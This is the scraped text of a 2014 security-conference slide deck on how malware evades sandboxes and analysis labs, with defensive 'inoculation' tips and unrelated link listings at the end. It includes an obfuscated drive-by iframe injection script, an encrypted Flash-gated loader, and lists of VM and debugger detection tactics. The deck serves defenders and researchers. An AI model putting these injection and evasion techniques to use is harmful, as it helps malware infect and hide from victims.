Thinking Outside the Sand[box]

60 %
40 %
Information about Thinking Outside the Sand[box]

Published on February 24, 2014

Author: junipernetworks



Kyle Adams - Chief Software Architect for Junos Web App Secure - presents at San Francisco's BSides 2014

Thinking Outside the[Sand]box Kyle Adams - Juniper Networks This presentation is for educational purposes only

Introduction Chief Software Architect for Junos Web App Secure “Junos Web App Secure is a security deception technology designed to lace web applications with honeypots on-the-fly” More recently, leading efforts in malware research. Can’t share exactly why, but I can share some interesting ideas that have surfaced as a result.

Primary Goal Inoculate your machine from infection by specific classes of malware

Background • Malware Analysis Background Malware Collection Techniques o Malware Analysis Techniques o Signature Development o • Malware Authoring ROI o o • o Malware ROI Optimizing for Success Hypothetical Example Evasion o o Distribution Evasion Sandbox Evasion

Background / Malware Collection How do analysts get malware samples? • • • • • • Web Crawlers Torrents Usenet Malware Repositories Email Droppers

Background / Malware Analysis How do malware analysts inspect malware? • • • Static File Analysis Virtual Machine Sandboxing Code Emulation Sandboxing

Background / Signatures How do malware signatures get created? 1. Get a sample 2. Analyze it for unique behaviors - Generate heuristic behavior signature 3. Analyze it for unique data patterns Generate file data signature 4. Distribute new signatures to customers 5. Remove old unnecessary signatures

Background / Malware ROI Uninterrupted Lifecycle: Research Development Testing Distribution Grow Infection Base The infection base grows indefinitely. The more machines infected, the more return the attacker gets for their initial investment. In other words… Time = Money

Background / Malware ROI Interrupted Lifecycle: Research Development Testing Distribution Grow Infection Base Signature Published Sample Detected Sample Collected The infection base grows until a signature is published. It then rapidly declines in growth rate and eventually becomes negligible. The more machines infected, the more return the attacker gets for their initial investment. So… Time to DETECTION = Money

Background / Optimizing For Success Hypothetical Example: Bob spends 20 hours researching his target environment. Another 20 hours writing some ransomware and testing it. Finally, Bob pays someone to distribute his malware for 50 cents per infection, with a distribution rate of 200 clients per hour. Bob’s ransom is $300 and 10% of his victims will chose to pay. So for every hour Bob’s malware is undetected, he makes: ((200 clients * .1) * $300) - (200 clients * $0.50) = $5,900 per hour Assume the infection rate remains constant for 72 hours, and minus Bob’s time at (~$50 an hour), Bob makes a total of $422,800.

Background / Optimizing For Success Hypothetical Example: Now assume his malware is detected and a signature is published, dropping the successful ransom collection rate to 1 client per hour. (hours_before_detection * ((200 clients * .1) * $300) - (200 clients * $0.50))) + (hours_after_detection * (((10 clients * .1) * $300) - (10 clients * $0.50)) Detection at 6 hours: Bob makes $52,870 Detection at 12 hours: Bob makes $88,500 Detection at 18 hours: Bob makes $120,130 Detection at 24 hours: Bob makes $153,760 So for each 6 hours Bob can avoid detection, he makes $30,000 vs. $1,770. Thats a lot of motivation!

Background / Distribution Evasion • • You can’t analyze something you can’t get. You can’t generate signatures if you can’t analyze So if you can avoid serving malware to analysis labs, you can avoid detection and signature distribution. Distribution Evasion Distribute malware only to a select set of targets, narrow enough to exclude analysis labs.

Background / Distribution Evasion Distribution Evasion Tactics: • • • • • • • • Don’t serve to search engines (Google, Yahoo, Bing, etc…) Don’t serve to known security lab IPs (Symantec, McAfee, etc…) Don’t serve to an environment you can’t infect (Missing Plugins, Unsupported OS, etc…) Randomly choose not to serve Serve only to specific countries/IP ranges Serve only to known browsers Serve only if referer is whitelisted Serve only once per IP

Background / Distribution Evasion Distribution Evasion Implementation: 1. Inject obfuscated drive-by download hook into compromised sites: <script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c-){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]) {p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('<0 8="7/a">6 2="4://5.9.f";b.g("<3 e="1" d="1"c=""+2+""></3>");</0>',17,17, 'script||ste|iframe|http|www|var|text|type|google|javascript|document|src|height|wi dth|com|write'.split('|'),0,{}))</script> Deobfuscated, it looks like this: <script type="text/javascript"> var ste = ""; document.write("<iframe width="1" height="1" src="" + ste + ""></iframe>"); </script> But this does nothing to stop automated crawlers in a research lab.

Background / Distribution Evasion Distribution Evasion Implementation: 2. Add client-side specificity:The malware requires a specific version of flash to exploit a client, so the drive-by code can actually hide itself unless you have that version of flash. <script type="text/javascript"> … encryption/decryption code … eval(decrypt("4f534514404652100c1016594d43460b1e1b54415844591750515d585d414a1d4b471 8585c535355431e445949085d54480970510276434f02030d14035656504c5f525a471c404258445119 1b0b5f5743555c5c15435c5d4658046a1a036511195a525d545a430d6d12056d1b17454352096d1b171 41e1941445c1613121b6f1b0c0b1b5a5445515c550a13100c", navigator.plugins['Shockwave Flash'].version)); </script> Now if the lab isn’t using flash version, the drive-by iframe will not

Background / Distribution Evasion Distribution Evasion Implementation: 3. Add server-side specificity and filtering:The iframe points to a server whose sole purpose is to exploit browsers and serve malware. In addition to picking the right exploit for the target client, it will also not serve malware if specific conditions are not met. • • • • • You’re not a search engine Your IP is not blacklisted, or is in a whitelist You’re using an exploitable OS and browser This is the first time you have loaded the iframe Drive by code has been injected into the domain of your referer Since the research lab doesn't know what conditions the distribution server requires, it is exceptionally difficult to trick it into serving the malware.

Background / Sandbox Evasion Sandbox Evasion Tactics: If any of the following are true, do not execute the malware payload: • • • • • • • Significant Clock Skew Debugger is attached Virtual Machine Detected No Internet Connection Unexploitable environment Sandbox Software Detected Sleep statements abort prematurely Sandboxes can only run for a fixed period of time per sample (usually 30-60 seconds), so the malware may try to run longer: • • Long sleep before payload execution Schedule payload execution for some time in the future

Background / Sandbox Evasion Sandbox evasion techniques can be grouped into several high level categories: • • • • • Specificity Triggers Detection Interruption Dialogs Any given malware sample may do zero or more of these.

Background / Sandbox Evasion Specificity: • • • • • • • Has internet connection Has correct software versions Has correct OS Has expected security policies Public IP is in correct geographical region Clock skew is minimal Account data is present (Gmail, AIM, Facebook, etc…)

Background / Sandbox Evasion Specificity: Requires Email Handing app like Outlook or ThunderBird. framework Requires Internet Connection Requires .NET Requires Win 95/98

Background / Sandbox Evasion Triggers: • • • • Sleep for several minutes Require multiple executions Wait for one or more reboots Wait for event o User opens .txt file o User launches browser o User switches to battery power o User updates windows o User installs software o User connects to WiFi o HID activity (Mouse, Keyboard, Webcam, Mic)

Background / Sandbox Evasion Triggers: Requires browser restart to trigger payload. Require a second execution.

Background / Sandbox Evasion Detection: • • • Debugger Hooks Virtual Machines o Registry Keys, Serial Numbers, MAC addresses o Processes, Services, Drivers, Open Ports o VM Specific ASM instructions Sandbox Software o Open Ports, Processes, Files

Background / Sandbox Evasion Detection: Themida: Legitimate Software Piracy Protection wrapper designed to detect VM’s and debuggers. Go figure, malware authors use it too. Debugger detection. And hey, they even explained how to turn off SoftIce (just in case you didn’t know how). No Printer?

Background / Sandbox Evasion Interruption: • • Analysis Framework Interruption: o Force Reboot or Logout o Enable Firewall / Whitelist C&C servers Screen Capture Interruption o Open dialogs minimized o Open other apps Maximized o Flashing components / Animation o Hidden MouseOver components

Background / Sandbox Evasion Interruption: Force a reboot. Screen Shot Evasion: The “Play” button flashes. We got lucky and took the screenshot at the right time.

Background / Sandbox Evasion Dialogs:

Background / Sandbox Evasion Simple Dialogs: What are they? • Fake Apps o Fake Installers o Fake Errors o • Why? o o o Prevent sandbox analysis Phish for information Legitimize  it looks real, so its probably safe  red flags (UAC, firewall notices, etc…)

Background / Sandbox Evasion Simple Dialogs: Legitimize UAC dialogs Require basic human input (click a button)

Background / Sandbox Evasion Advanced Dialogs: Require account details TOS acceptance Combination Lock Graphic based dialogs • • • •

Background / Sandbox Evasion Advanced Dialogs: Requires password. Presumably available with the download link. Captcha style dialog Fake dialog. This dialog looks similar to the default theme of XP, but is clearly not.

Deceptive Inoculation Bottom line, malware takes great care not to run in a sandbox environment. Lets all be sandboxes! (or at least pretend to be)

Deceptive Inoculation • Distribution Deception o • Prevent your personal computer from being sent malware in the first place (stop drive-by-downloads). Sandbox Deception o Prevent malware from executing a payload when launched on your personal computer.

Inoculation / Distribution Evasion Pretend you’re google bot: 1. Firefox: Install User-Agent-Switcher 2. Set User-Agent to: Googlebot-Image (Googlebot) Pretend none of your plugins are enabled: 1. Firefox: Go to Tools > Add Ons 2. For everything in the list, select “Ask To Activate” (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...) Disable Referers: 1. Firefox: Go to about:config 2. Set “network.http.sendRefererHeader” to 0

Inoculation / Distribution Evasion Request Suspicious Content Twice: This doesn’t exist yet, but what if…. iframe: I F R A M E embedded flash repeat: IFRAME V A L I D A T O R Bad Server no embedded flash iframe: no embedded flash Good Server

Inoculation / Sandbox Evasion Permanent Debugger 1. Install a debugger 2. Hook every process automatically Spoof VMWare Artifacts: 1. Create stub exe called “VBoxService.exe” and leave it running on boot. Skew your clock 1. Change system time to be 1 year behind 2. Disable clock syncing

Inoculation / Sandbox Evasion Sandbox Emulation 1. Open ports (cuckoo: 2042, mongodb: 27017) 2. Configure as Cuckoo Guest: But make sure to cripple the agent! These changes may result in instability to the system, and would require some additional testing in a well used desktop environment. 1. Add a dll named “dbghelp.dll” to registry so it loads into every process 2. Temporarily Assign windows product ID of “76487-337-8429955-22614” (Assign on boot, revert on shutdown) Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The

Conclusion Practicality: As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly. Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.

Conclusion Perceived Efficacy: With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed. True Efficacy: Hard to say how effective it really is, because the samples this works on, are less likely to be identified as known malware. Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.

More Information Contact Info: Email: Twitter: kadams_sec LinkedIn: Presentation Material: References:

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

Thinking Outside The Sandbox WAHM Small Business and ...

Thinking Outside The Sandbox WAHM Small Business and Social Media blog offers website traffic insight into how to understand social media and use it to ...
Read more

Media Kit • Thinking Outside The Sandbox

Hello. Thanks for stopping by. Thinking Outside The Sandbox is a unique blog about the business side of blogging. We are a team of amazing bloggers from ...
Read more

Thinking Outside the Sandbox - Southern Living

Thinking Outside the Sandbox. ... “I’ve just found sand to be the most fulfilling thing in my life because I really carve from the heart,” says Dan.
Read more

Thinking Outside The Sandbox | Facebook

Thinking Outside The Sandbox. 8,612 likes · 11 talking about this. Learn the business side of blogging. Always get notifications:...
Read more


Nontoxic spent foundry sand is gaining increased credibility as a construction material. Cost effectiveness and growing research demonstrating the value of ...
Read more

Media Kit • Thinking Outside The Sandbox Family DIY ...

Hello. Thanks for stopping by. Thinking Outside The Sandbox: Family is a unique mom blog. We are a team of 22 amazing parents. Between us, we have 37 ...
Read more

Stage Directions - Thinking Outside the [Sand] Box

Know Theatre uses humble cork for a magical realism effect. When Know Theatre chose to produce Militant Language: A Play with Sand by Sean Christopher ...
Read more

Simple Spring Cupcakes - From Thinking Outside The Sandbox

If you are looking for one adorable sweet treat, we have you covered! Use store bought cupcakes or your favourite recipe to make Simple Spring Cupcakes.
Read more